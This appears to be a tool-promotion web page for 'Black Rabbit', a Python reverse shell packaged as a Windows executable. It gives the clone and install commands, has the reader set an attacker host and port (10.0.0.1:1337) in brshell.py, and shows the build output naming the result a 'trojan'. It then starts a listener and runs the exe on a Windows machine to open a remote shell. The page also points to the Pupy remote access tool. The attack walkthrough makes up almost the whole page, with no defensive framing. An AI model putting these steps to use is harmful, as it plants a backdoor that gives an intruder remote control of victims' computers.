Black Rabbit – Python Cross-Compiled Reverse Shell for Windows

Black Rabbit – Python Cross-Compiled Reverse Shell for Windows

Installation

apt-get install wine
git clone https://github.com/m4n3dw0lf/blackrabbit.git

Usage

#Edit the Master host informations:
#brshell.py
host = '10.0.0.1'
port = 1337

#Build the Cross-Compiled .exe for Windows:
python setup/cross-compiler.py brshell.py
                     .
                     .
                     .
2717 INFO: Building EXE from out00-EXE.toc completed successfully.
[!] Done, brshell.exe trojan inside 'dist/' folder

#Start the listener
python controller.py 10.0.0.1 1337

#Execute the .exe file in a windows box
Welcome to Black Rabbit Shell, be nice.
[+]brshell: help 

CREDITS: m4n3dw0lf
DOWNLOAD BLACKRABBIT

Other tools you may like:

Pupy – Open Source Cross Platform Python Remote Access Tool